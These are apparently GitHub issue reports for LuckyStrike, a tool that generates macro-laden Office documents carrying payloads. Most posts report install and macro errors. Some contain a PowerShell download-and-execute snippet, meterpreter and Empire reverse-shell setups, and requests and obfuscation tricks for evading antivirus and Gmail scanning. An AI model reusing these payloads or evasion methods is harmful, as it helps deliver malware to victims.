It looks like the current version from the git is unusable, I've tried tracking down the error but
I couldn't really figure the root cause.

As it looks, $script:doctypeis never set in this version, and it seems impossible to create a new doctype
for some reason. I've manually set $script:doctype and then tried adding a new file but got
the following error:

Invoke-SqliteQuery : Exception calling "Fill" with "1" argument(s): "SQL logic error or missing database
no such table: Assoc_Infection_DocType"
At C:\luckystrike\luckystrike\luckystrike.ps1:205 char:17

+ ... tmpoutput = Invoke-SqliteQuery -SQLiteConnection $dbConnection -Query ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorException
+ FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Invoke-SqliteQuery

Can you take a look at it? I think I'll try using 4a05b63aed687392cffe0e14e69256df3eb1eec3
with hopes that it would just work there.

Note:
Since 1.1.7 only supports xls, the bug is fixed there, but makes it kind of less usable 👍
What condition sets $script:doctypeto a valid one? I couldn't find it in the code.

Trying to install on Windows 10 x64 box.

I getting the following error:
### LUCKYSTRIKE INSTALLATION ROUTINE ###
[*] Installing\Importing Dependencies..
[*] Creating C:\work\luckystrike
[*] Downloading db.sql
[*] Creating & initializing database: C:\work\luckystrike\ls.db
Invoke-SqliteQuery : Unable to find type [DBNullScrubber].
At line:70 char:9
+         Invoke-SqliteQuery -SQLiteConnection $dbConnection -Query $in ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : InvalidOperation: (DBNullScrubber:TypeName) [Invoke-SqliteQuery], RuntimeException
+ FullyQualifiedErrorId : TypeNotFound,Invoke-SqliteQuery

Trying to get help on Invoke-SqliteQuery : Unable to find type [DBNullScrubber] on Google, found... nothing??!! :(
Do I miss something obvious?

Hi,

LuckyStrike crash when using an executable with reflectivePE infection. having the attached issue. Working on Win7 32bits.

Any idea ?

Thanks

Hi,

I get this error when i try to run the script. i tried both regular and admin command prompts.

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> iex (new-object net.webclient).downloadstring('https://r
aw.githubusercontent.com/Shellntel/luckystrike/master/install.ps1')

LUCKYSTRIKE INSTALLATION ROUTINE

[] Installing\Importing Dependencies..
[] Module (PSSQlite) not found, attempting to install and import.
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.co
m/Shellntel/luckystrike/master/install.ps1') : [!] Module install/import error!
Attempt to manually install PSSQlite
+ CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorExcep
tion
+ FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorExceptio
n

Hi, on launch the following error is given [!] - Module Invoke-Obfuscation not installed. Obfuscation options will not be available.
which invoke-Obfuscation module should be used and how is it to be installed?

thanks

Hello,

When i finished all steps and got malicious xls file, I found that the macro threw a error:"Compile error---sub procedure or function not defined". What's going on here? Thank you!

Hi Jack,

PLease, could you make sense of the following:

I have an .EXE reverse_tcp payload that i run on windows 10 x64, it does not flag Kaspersky nor Defender and I manage to open a meterpreter shell without detection.

When I infect an XLS or word document using LUCKYSTRIKE with the same FUD EXE, Kaspersky starts to detect the XLS file as virus. why detects the XLS document but not the EXE? and whether there is a way around it maybe encryption option if possible with domain name for EXE like Powershell script option in LuckyStrike.

Thank you

hi guys, im stuck! how can i bypass this?

thanks you

I am getting a "Bug found. Doctype not understood. Doctype: " when I try to generate a file.

ls-debug-08212017160011.txt

When I use certutil, it always errors this, and the payload does not execute, as it breaks on Shell (expath)

I am running Excel 2013

There also lacks documentation on what each infection method does

When I try save to disk, it has worked before, but now I get:

works than seg faults when i press the W key. my computer does powershell very well. can you halp me? would be cool if it could do the auto hamburger attack.

If 7-11 is open 24 hours a day, 365 days a year, why are there locks on the doors?

Hello, after reviewing the Wiki i've added an executable payload to the catalog but once i have to embed it inside a doc i don't see it in the payload selection menu. I confirm that is present in the Catalog.

Option 1 is not creating the new file and throwing an error. Please see the image for the error.

it is not recognizing the xls file in option 2.

I am trying to make a similar template but i always got this error

Some part of the code is missing and i'm not expert in visual basic, can you help me please?

Saw you guys at DerbyCon and had to try this out!! Thanks for your hard work.

Was wondering if you could help with a compile error I'm getting... I installed and used luckystrike on Win10 x64 to inject an exe via disk, generating new xls file. Then I was testing opening it on Win7 x64 box using Excel 2013 (the Win10 box also had Office 2013 and is generating the same compile syntax error). But when I click enable macro, the VBA code is throwing the error. I'm not familiar with VBA - is there something I'm doing wrong? Your help is appreciated!

in Windows 10 and Windows 8.1 i have the same probleme to generate office doc with luckystrike 2.0.
please find attached document log.
with my best thinks

On a fresh install on a Windows 10 VM I try to run luckystrike.ps1 and I get the following:
Could not find database at C:\Windows\system32\ls.db. Did you run the install script?

I ended up moving ls.db from C:\Windows\system32\luckystrike\ to C:\Windows\system32\
but that doesn't feel quite right.

the code was detected in runtime by windows defender, dont know if this is so with other AVs. but it was kill in runtime. any idea if this can be fixed?

Well, running a shell command works, though no embedded exes can be launched.
User name is 'w7_x86' (so, nothing special). Exes I embed run with no problem when launched the straight way (through cmd or by double-clicking in explorer).

If you try to send the output of this tool (XLS file with powershell empire payload) via gmail, Google detects the virus. Can you implement this bypass technique, which solves this problem http://www.blackhillsinfosec.com/?p=4679

Something like:
c = "poW" & Chr(101)
c = c + Chr(114) & Chr(83) . . . .

Enabling macro give me Run-Time error '5':
Invalid procedure call or argument.

I am using the dev branch because I keep running into the issue of out of memory.
The debug problem is show at line "Shell (pth)"

Happen on both Save to disk and Centriul. Going to microsoft/addins, I do see both the execute file and the text file with encoded code in it.

I am using windows 10 and Microsoft excel 2016

Hi,

for test purpose I'm trying to make luckystrike compile a .xls that download a remote .exe.

For doing this I'm using an external .ps1 file

$down = New-Object System.Net.WebClient
$url = 'http://url/test/test.exe'
$file = 'test.exe';
$down.DownloadFile($url,$file);
$exec = New-Object -com shell.application
$exec.shellexecute($file);

If I execute this script, it download and run .exe regurally: If i try to use it as Powershell command into payload, the final .xls open regurally in Excel but then it crash, not downloading and opening nothing.

Any suggestion ? :)

Thank you :)

Having issues where it appears that I have stored a PowerShell payload within the catalog, but then it appears to go missing when trying to use that payload through the selection process. Let me know if this is a user error and not using the tool properly.

Debug output:

POWERSHELL VERSION:     5.1.14409.1005
EXCEL VERSION:          12.0
OFFICE BITNESS:
OFFICE REGKEY:          HKLM:\SOFTWARE\Wow6432Node\Microsoft\Office\12.0\Outlook
WINDOWS VERSION:        6.1.7601.65536
WINDOWS BITNESS:        64-bit
ISADMIN:                True

    __               __            _____ __       _ __
   / /   __  _______/ /____  __   / ___// /______(_) /_____
  / /   / / / / ___/ //_/ / / /   \__ \/ __/ ___/ / //_/ _ \
 / /___/ /_/ / /__/ ,< / /_/ /   ___/ / /_/ /  / / ,< /  __/
/_____/\__,_/\___/_/|_|\__, /   /____/\__/_/  /_/_/|_|\___/
                      /____/

                ALL YOUR PAIN IN ONE MACRO.

                  2.0 - @curi0usJack

============= Main Menu ================

        1)  Payload Options
        2)  Catalog Options
        3)  File Options
        4)  Encode a PowerShell Command
        99) Exit

Select: 2



=========== Catalog Options ============

  PAYLOADS:
        1) Add payload to catalog
        2) Remove payload from catalog
        3) Show catalog payloads

  TEMPLATES:
        4) Add template to catalog
        5) Remove template from catalog
        6) Show catalog templates

        99) Back

Select: 1

Title: psempire

Target IP [Optional]:
Target Port [Optional]:
Description (e.g. empire, windows/meterpreter/reverse_tcp, etc) [Optional]:

Choose payload type:
        1) Shell Command
        2) PowerShell Script
        3) Executable
        4) COM Scriptlet
        98) Help
Selection: 2

Enter full path to .ps1 file: C:\Users\username\Desktop\PowerShell\luckystrike\test.ps1

[+] - Payload added.

=========== Catalog Options ============

  PAYLOADS:
        1) Add payload to catalog
        2) Remove payload from catalog
        3) Show catalog payloads

  TEMPLATES:
        4) Add template to catalog
        5) Remove template from catalog
        6) Show catalog templates

        99) Back

Select: 99



============= Main Menu ================

        1)  Payload Options
        2)  Catalog Options
        3)  File Options
        4)  Encode a PowerShell Command
        99) Exit

Select: 1



=========== Payload Options ============

        1)  Select a payload
        2)  Unselect a payload
        3)  Show selected payloads
        99) Back

Select: 1



Please select the document type you wish to make:

        1)  xls
        2)  doc


Select: 2



=========== Select Payload =============

        99) Done.


Select:

The PS payload is stored successfully within the catalog, however it does not seem accessible when trying to select it for use.

You can see in the output below that the payload does appear to be properly stored within the catalog.

=========== Catalog Options ============

  PAYLOADS:
        1) Add payload to catalog
        2) Remove payload from catalog
        3) Show catalog payloads

  TEMPLATES:
        4) Add template to catalog
        5) Remove template from catalog
        6) Show catalog templates

        99) Back

Select: 3



Name     TargetIP TargetPort PayloadType
----     -------- ---------- -----------
psempire                     PowerShell Script

Hi @curi0usJack ,
I have installed Luckystrike on my Windows 7. I have done all the setup successfully , the only problem that i am facing rite now is that i am generating a new excel file but I am not able to find the generated file on the mentioned folder path.

Can you Provide me a solution on this.

Hello, I'm getting this message once i install and run lucky strike module.
As attachment the log file and the screenshot.

are you able to tell me how to properly install invoke-obusfcation by any chance ? I did git clone that repo and imported module but seems not working like this.

thanks

ls-debug-08062017082020.txt

hi,

I add an exe payload and create an excel file. However i get an error saying file not found. The file is still on my computer and the path is correct. No errors are generated by the luckystrike script. Its when i run the macro code, that i get this error. I tried both certutil and save to disk method.

Produces file not found errors if not using correctly cased path (or at least drive letter).

Source: https://www.youtube.com/watch?v=-m22_kzIsrE

When generating an Empire payload, I'm running into the above error when enabling macros. Tested on a Windows 7 machine w/ Excel 2013 in the lab and it works fine, but on a Windows 10 box with Excel 2016 I'm running into the error. A basic "calc.exe" shell payload works just fine.

Edit: Super cool tool by the way. I love where you're going with it!

Hi @Shellntel,
I already installed excel (2007)... but when i generate new xls error as bellow
[] - Generating macro code.
[] - Adding macro to workbook.
[] - Embedding payloads into workbook.
[] - Error occurred creating document. Could not load file or assembly 'Microsoft.Office.Interop.Excel, Version=12.0.0. of its dependencies. The system cannot find the file specified.

Please help me

could you please see this:

[DBG] - PROCESS-MENUOPTIONS: SELECTION: 1
[DBG] - CREATE-WORD: LINELENGTH:
[DBG] - CREATE-WORD: ISMODIFY: False
[DBG] - CREATE-WORD: EXISTINGPATH:
[DBG] - DO-FILEPREREQS: EXISTINGPATH:
[DBG] - DO-FILEPREREQS: FILENAME:
[DBG] - DO-FILEPREREQS: DOCTYPENAME: doc
[DBG] - DO-FILEPREREQS: OFFICEVERSION: 16.0
[DBG] - DO-FILEPREREQS: POWERSHELL VERSION: 5.1.15063.502
[DBG] - DO-FILEPREREQS: OFFICE VERSION: 16.0
[DBG] - DO-FILEPREREQS: OFFICE BITNESS: x64
[DBG] - DO-FILEPREREQS: OFFICE REGKEY: HKLM:\SOFTWARE\Microsoft\Office\16.0\Outlook
[DBG] - DO-FILEPREREQS: WINDOWS VERSION: 10.0.15063.0
[DBG] - DO-FILEPREREQS: WINDOWS BITNESS: 64-bit
[DBG] - DO-FILEPREREQS: ISADMIN: True
[DBG] - DO-FILEPREREQS: DOCTYPEID: 2
Index was outside the bounds of the array.

At C:\Windows\system32\luckystrike\luckystrike.ps1:1783 char:4

•         $Word.DisplayAlerts = "wdAlertsNone"
  

•         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  

  • CategoryInfo : OperationStopped: (:) [], IndexOutOfRangeException
  • FullyQualifiedErrorId : System.IndexOutOfRangeException

PS C:\Windows\system32\luckystrike>

Thank you

When I test command in powershell, it works flawlessly, but when I try to create macro or metadata with it , it doesn't work . Command I use is:

$down = New-Object System.Net.WebClient; $url = 'domain\path\file'; $file = 'file.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;

in Windows 10 and Windows 8.1 i have the same probleme to generate office doc with luckystrike 2.0.
please find attached document log.
with my best thinks
ls-debug-08222017163953.txt

Hi everyone, I successfully installed and also created .xls infected file. But now my problem is how to use
Metasploit or any listening mechanism which approve and receive meterpreter connections from infected system?

I did set the following items in luckystrike:
Target IP: 10.0.0.125 (My KALI IP address)
Target Port: 35313 (My listening port on KALI that selected in PAYLOAD setting in METASPLOIT)
Description: windows/meterpreter/reverse_tcp

Please Help me for accomplish.
Best Regards.

Specifically on my win10 test vm. no idea why.

Hi!
I try generate new xls file, and got error
[] - Generating macro code.
[] - Adding macro to workbook.
[*] - Embedding payloads into workbook.
[!] - Math bug found. Parts length doesn't match numrows in legend. Run in -Debug

In debug
[] - Adding macro to workbook.
[DBG] - Executed Query: SELECT * FROM ActiveWorking. Params:
[] - Embedding payloads into workbook.
[DBG] - Executed Query: SELECT * FROM Payloads WHERE ID = @id. Params: id:1
[!] - Math bug found. Parts length doesn't match numrows in legend. Run in -Debug

How can i fix this?
Thanks!

Entering something other than an integer when selecting a payload type for a new payload bombs. Entered an empire launcher string by accident. Need to check var for proper type/value.

Can you provide sample XLS template?

This would help a lot :)

[*] - Generating macro code.
[*] - Adding macro to workbook.
[*] - Embedding payloads into workbook.
Insufficient memory to continue the execution of the program.
At C:\Users\zoid\luckystrike\luckystrike.ps1:1050 char:6
+ ...             $Worksheet.Value.Cells.Item($startrow, [int]$legend.Start ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : OperationStopped: (:) [], OutOfMemoryException
    + FullyQualifiedErrorId : System.OutOfMemoryException

[+] - Success. File saved to ...

The file saves, but does not run, as the binary is incomplete. "this app can't run on your pc" if I try to run it manually from AddIns folder. Running from the macro it gives error when trying to launch file

It works with one payload, but with this one it just dies. I even tried upping my allowed memory in powershell from default to 8 gb

My memory usage doesn't change any significant amount, but cpu spikes, as it should

Throws generic "Method 'Run' of object 'IWshShell3' failed" error.

hi first thanks for this job, i want to let you know that's detected by AVAST AND KASPERSKY AND NOD32, can you implement new encrypting methods! and can you set the set the generated Exel ouput as .macro-enabled that's better than 2003 office type...thanks in advance

The first problem i encountered was that i can't delete payloads.

http://prntscr.com/cmpxcx

And the second problem when i try to generate the payload to a xls.

http://prntscr.com/cmpxxo

^^ sorry for the foreign language

So I have all the prequsites for this program except for pssqlite, which this script is supposed to automatically install, but it justs quits in the blink of an eye after I enter the command in, luckily I got a snapshot of the response from powershell, I tried to install pssqlite for powershell v5 manually but I couldn't find any tutorial.
Help?

hi, how can i make fud the macros oradd my own bypass method to the payloads in lucky? cuz avast always detect all macros
Greetings, my friend

i have this problem, when i use the cell-embed obfuscated, i generate the ps1 in empire i try in base64 and no base 64, but the issue persist...
thanks = )

Occurs in 1.1.7 when combining payloads. To repro, add the following cobalt strike payloads:

1. Powershell command / Metadata attack
2. beacon.exe (stageless) / Certutil attack

Generate file from template (calendar)

Hi,

First of all, thank you for developing this tool and for making it so user friendly.

I am trying to attach an .exe to a .xls file using either the Save On Disk or Certutil methods. I don't have any error when I run luckystrike, however when I launch the infected .xls file and enable macro, I have the following error.

(Save on disk method here, but I have the same error with Certutil)

Debug

I saw a previous issue where someone was having this error and so I went to check the AppData/Roaming/Microsoft/AddIn like you said. The .exe file is present on the directory but it is slightly smaller than the original one (115ko vs 122ko).

When I try to run it manually, I have a windows error "This app can't run on your PC". So it seems that the .exe is somehow damaged during the process and so when the macro tries to run "Shell(pth)" it fails.

I am running luckystrike on a Windows 7 VM with PS v5 and Microsoft Excel 2016 and the previous captures are from a Windows 10 Host with Microsoft Excel 2016. The same error occurs when launching the .xls file on the Windows 7 VM.

Don't hesitate to ask if you need more details to help me on this issue!

Cheers